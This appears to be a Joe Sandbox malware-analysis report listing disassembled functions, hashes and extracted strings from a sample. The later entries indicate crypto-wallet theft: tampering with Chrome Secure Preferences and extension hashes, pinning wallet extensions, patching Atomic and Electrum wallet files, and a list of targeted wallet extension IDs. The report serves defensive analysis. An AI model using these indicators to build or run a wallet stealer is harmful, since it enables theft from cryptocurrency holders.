                                                                                                                                                                          • Opcode ID: 73303e594dcf2d7f7fcf4ee0bc9beea71639d11a553cf695dfe2529ae579db59
                                                                                                                                                                          • Instruction ID: a8178cc902a055d0aac4aa72dcb63d0a1331187ce7604c491ddcde9a8f552de3
                                                                                                                                                                          • Opcode Fuzzy Hash: 73303e594dcf2d7f7fcf4ee0bc9beea71639d11a553cf695dfe2529ae579db59
                                                                                                                                                                          • Instruction Fuzzy Hash: CB110B31D0E25145FF11BF189405BBDD661AF91B84FD68531E74D076BADFACDA008720
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
                                                                                                                                                                          • Instruction ID: d2371b7d4c480a1deb8d17d4d17f71f5b3b78eaef299a3f9ce68ee57d2890962
                                                                                                                                                                          • Opcode Fuzzy Hash: c1ffcc89cb8493f0f8be23ca563807c8961bbd02907f0c7bf9713bdb1fdb5734
                                                                                                                                                                          • Instruction Fuzzy Hash: E401DB61A0974140EA14FB5A590487EE796FF99FE0F894631EE5C03BF6CE7CD6015310
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF7ABC3E3AC: FindClose.KERNEL32(?,?,?,?,00007FF7ABC25182), ref: 00007FF7ABC3E3B6
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC28816
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1011579015-0
                                                                                                                                                                          • Opcode ID: 0bf529d44654acba6db4fde97a959cadf95f411112d3ed8c66c16f42ac226359
                                                                                                                                                                          • Instruction ID: fe46b48f917c1d4b16e838d982a34abf343ddb55610aaf4ddaf4f481adeb5113
                                                                                                                                                                          • Opcode Fuzzy Hash: 0bf529d44654acba6db4fde97a959cadf95f411112d3ed8c66c16f42ac226359
                                                                                                                                                                          • Instruction Fuzzy Hash: 86016D61B2658281EA58EB2DD04577CA362EF44F88FD50032CA0C0B679EE2DD9818314
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                          • Opcode ID: d3401f3e4d2250dd56d37f3cd95b521e13fbbb7dca3d2d63ef4e781712d10a8a
                                                                                                                                                                          • Instruction ID: 75486258a5a28a031042cd182567a5753f60cd20d470492353ee4158f6ca35db
                                                                                                                                                                          • Opcode Fuzzy Hash: d3401f3e4d2250dd56d37f3cd95b521e13fbbb7dca3d2d63ef4e781712d10a8a
                                                                                                                                                                          • Instruction Fuzzy Hash: 57018822B1974181DA00FF1BE4405AA6360FB98FC4F541432EF0D47775CE39D452C750
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: b4b03ac02d2629453174211f4dc61aa90a3c0f5077e4474c0e6e11895f98e5cb
                                                                                                                                                                          • Instruction ID: a3e4b8db4bb117a2a7e81ee867dbf73402bcffa181b3d317c324b8e85f25b3ce
                                                                                                                                                                          • Opcode Fuzzy Hash: b4b03ac02d2629453174211f4dc61aa90a3c0f5077e4474c0e6e11895f98e5cb
                                                                                                                                                                          • Instruction Fuzzy Hash: 6EF0A721B0BB4249FE54FB9ED0C9D79A191AF587C0F958134EA4D83772DE2CF6548720
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: 4efc3bbd2a2c645fd0db537572d98d8f29f97fe74de9b16cb9f60c23ed73cdf5
                                                                                                                                                                          • Instruction ID: b053c180c2adc3c4c298e3fda6de62795a45b7e254838609aac93980f3d49bbd
                                                                                                                                                                          • Opcode Fuzzy Hash: 4efc3bbd2a2c645fd0db537572d98d8f29f97fe74de9b16cb9f60c23ed73cdf5
                                                                                                                                                                          • Instruction Fuzzy Hash: 1AF0E221B0A70249EE44FB5A91C89B8A150AF59BC0F818030EE4D03372DE2CA6144730
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                          • Opcode ID: 2daa704a1113411147fe56d36985fed32410f3de1735a8b012768dc9e0f98ebf
                                                                                                                                                                          • Instruction ID: deab217c6a4961efd13583e7f389d9f83998e4f765d0ceaae1b33c9cd67ef7a8
                                                                                                                                                                          • Opcode Fuzzy Hash: 2daa704a1113411147fe56d36985fed32410f3de1735a8b012768dc9e0f98ebf
                                                                                                                                                                          • Instruction Fuzzy Hash: 77E0E531A0A64241EA547B7C9288578B1529F407B0F954330E738022F2DF2999504120
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                          • Opcode ID: 0fd4cc58644b5402a25c0dfa9b3625bd7c8d68a458d4710dc038b73485c4a2e5
                                                                                                                                                                          • Instruction ID: d451a28ff975026a297c95e0d5be6047776c220f089a181672e36a70318faef1
                                                                                                                                                                          • Opcode Fuzzy Hash: 0fd4cc58644b5402a25c0dfa9b3625bd7c8d68a458d4710dc038b73485c4a2e5
                                                                                                                                                                          • Instruction Fuzzy Hash: 0AC08C10E4B403A1ECAC336D0899A70C1906F103B0FD20B34D23E414F1AD1CB49A4B31
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFindNext
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2029273394-0
                                                                                                                                                                          • Opcode ID: 659505a9c375cc01c495d22581c13f432a4b6dbd6bc0ee4159a3e7381a1f0396
                                                                                                                                                                          • Instruction ID: 13b76f107e4f06322cdd4c141b6003692169e7576c483a2fe593babc5cf42fcb
                                                                                                                                                                          • Opcode Fuzzy Hash: 659505a9c375cc01c495d22581c13f432a4b6dbd6bc0ee4159a3e7381a1f0396
                                                                                                                                                                          • Instruction Fuzzy Hash: 6CC09214F1B903D2E6983B7B5C92A2991E4BF89761FC28430C10DC0270DE6CA2EB8F31
                                                                                                                                                                          APIs
                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF7ABC447BB,?,?,?,?,?,?,?,?,?,00007FF7ABC3EED5), ref: 00007FF7ABC5A1A6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                          • Opcode ID: c914a04fb4df925cb0be04d76816c22241ac4084935987988ecfb382394f57d2
                                                                                                                                                                          • Instruction ID: c8cf4fc60565e852be2eb93dcafa54d1b48ca6bc7b2430d89b2a600664d76eb9
                                                                                                                                                                          • Opcode Fuzzy Hash: c914a04fb4df925cb0be04d76816c22241ac4084935987988ecfb382394f57d2
                                                                                                                                                                          • Instruction Fuzzy Hash: BCF05E50F8F28B85FE54766A5981B7691805F44BA0F8A4330EC2E862F2DD6CA4808630
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                                                                                                                          • String ID: $
                                                                                                                                                                          • API String ID: 2880407647-227171996
                                                                                                                                                                          • Opcode ID: 9c06f1f85bf3d5005be47dc3ff6a42340ad58a78e291ba71189e4169d13e8b92
                                                                                                                                                                          • Instruction ID: 532efb310898d3e7129a2369b73633c19b6f3dab60287fd2c7ee6776834fa317
                                                                                                                                                                          • Opcode Fuzzy Hash: 9c06f1f85bf3d5005be47dc3ff6a42340ad58a78e291ba71189e4169d13e8b92
                                                                                                                                                                          • Instruction Fuzzy Hash: B603F772A152C28FE7759F29D990BFE7791FB44388F815135DA0A97B74DB38AA00CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: +$Could not open Secure Preferences file: $Could not write to Secure Preferences file: $Modified Secure Preferences for profile at $Wallet ID not found in chromeData: $\Secure Preferences$data$extensions$hash$invalid map<K, T> key$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$macs$protection$settings
                                                                                                                                                                          • API String ID: 3668304517-1646890684
                                                                                                                                                                          • Opcode ID: fd04303a9dee5b73214959068a05b5daea200b852c261ae5ac77bfc3c25db181
                                                                                                                                                                          • Instruction ID: 512b15369f593178b65db260a051095ab46c1af4fd29436d3bb5173a38507d38
                                                                                                                                                                          • Opcode Fuzzy Hash: fd04303a9dee5b73214959068a05b5daea200b852c261ae5ac77bfc3c25db181
                                                                                                                                                                          • Instruction Fuzzy Hash: D372A672B16AC249EB20EF28D4447EDA361FB85788FC14132DA5D5BAB9EF38D645C310
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: %$Could not open Preferences file: $Could not write to Preferences file: $Pinned wallets for profile at $\Preferences$developer_mode$extensions$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pinned_extensions
                                                                                                                                                                          • API String ID: 3668304517-161018542
                                                                                                                                                                          • Opcode ID: 5a0a88db01a2ae52d9ed0412e4eb19116bdcc8f145b02e007bab939f47e4ca2b
                                                                                                                                                                          • Instruction ID: 55f8c6389bf38e54122dcbc07834dd7ae950b8a3c3101e7a72ac5cb8371e8d4c
                                                                                                                                                                          • Opcode Fuzzy Hash: 5a0a88db01a2ae52d9ed0412e4eb19116bdcc8f145b02e007bab939f47e4ca2b
                                                                                                                                                                          • Instruction Fuzzy Hash: 7E62B132B1AB8295EB10EF28D844BEDA761FB84788F854132DA4D5B7B9DF78D644C310
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: Directory: $ $ (User: $.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Wallet: $\resources\app\assets\index.js$atomic.exe
                                                                                                                                                                          • API String ID: 3668304517-342767286
                                                                                                                                                                          • Opcode ID: cfbfe38844ac1249446e3b2dc8f8e8cff92513fb2fbe900c48d6925224fc0cb8
                                                                                                                                                                          • Instruction ID: 8b838727aac5f401e49d706ad5a09ca43a5b6cd82185fda2346aeba7cdaec924
                                                                                                                                                                          • Opcode Fuzzy Hash: cfbfe38844ac1249446e3b2dc8f8e8cff92513fb2fbe900c48d6925224fc0cb8
                                                                                                                                                                          • Instruction Fuzzy Hash: F3825672A197C681EA30AB18F0447AEA361FB857A4F914335DAAC07AF9DF7CD184D710
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
                                                                                                                                                                          • String ID: Directory: $ $ (User: $.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Wallet: $\resources\app\assets\index.js$atomic.exe
                                                                                                                                                                          • API String ID: 4261731725-342767286
                                                                                                                                                                          • Opcode ID: e006c58df6e181a62bdbf6a3b1fe6c1ab3205dde32a769c5e87dae4e1891299d
                                                                                                                                                                          • Instruction ID: d423537d2d374c61db4bc58df8f413c8082bf66c239a035b7b83b17b0c439e30
                                                                                                                                                                          • Opcode Fuzzy Hash: e006c58df6e181a62bdbf6a3b1fe6c1ab3205dde32a769c5e87dae4e1891299d
                                                                                                                                                                          • Instruction Fuzzy Hash: B0826672A197C681EA30AB18F0447AEA361FB857A4F914335DAAC07AF9DF7CD184D710
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: 1Gl-tclZiwzl6g0KiESfdjoxWpKS4etTy$1PawyaJNdMeRZ58R98lDRBDFhVGrvATkk$1Q8Qas1_ewfzUMTS1hokwKRwiYzLHSrWN$1T6M8C2frvgzxZ5QXvqg3JwQUquC0rvYi$1Wvj4ujXtbazj3MOxU05QXrkL4bCHwl2J$1XbWC5eWnyEZCUtT5_ZxFbRnbH9aKnawV$1Zz3U8oG_dniKMFaigIhNDA-r_Qxo1qXX$1hpFGL_MKbqCzc4V3YaZ29A4JaDrWxIN2$1lRNFMUWkcGIGS67XkeWfhXMPjev6B5Cg$1mwoKtHlgA_FGSglUyMP1ZtIPsSVHtwF1$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
                                                                                                                                                                          • API String ID: 73155330-2179249122
                                                                                                                                                                          • Opcode ID: 918cb4a1bcb761b1dfa28e1cb2a0f5d410f0230b9cf2e836c29f87e62ae8fd36
                                                                                                                                                                          • Instruction ID: 6a644e0de2e3e6c3a7bac6da2752daf7af0de27ae666e2fdfa6a30d2c84d019c
                                                                                                                                                                          • Opcode Fuzzy Hash: 918cb4a1bcb761b1dfa28e1cb2a0f5d410f0230b9cf2e836c29f87e62ae8fd36
                                                                                                                                                                          • Instruction Fuzzy Hash: 9CA19852D65BCA45E721EB39C8616F59321FBEA348F916326E58C21877EF68B2C48700
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: Coinbase$Crypto$Exodus$Martian$MetaMask$Nami$OKX Wallet$Phantom$Ronin Wallet$Trust Wallet$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
                                                                                                                                                                          • API String ID: 73155330-809053197
                                                                                                                                                                          • Opcode ID: 558d78c46f37a75caeecddcf5e82f011c461c1e932c5431e2adaf8b63981ecbf
                                                                                                                                                                          • Instruction ID: 42d2d7d3e281f10296a7c134dbb1f4bcb44cd0380aabbbcb6d421329e0019d87
                                                                                                                                                                          • Opcode Fuzzy Hash: 558d78c46f37a75caeecddcf5e82f011c461c1e932c5431e2adaf8b63981ecbf
                                                                                                                                                                          • Instruction Fuzzy Hash: A0A19752D25BCA45E721EF39D8917F59321BBEA348F916326B58C21877EF68B2C4C700
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
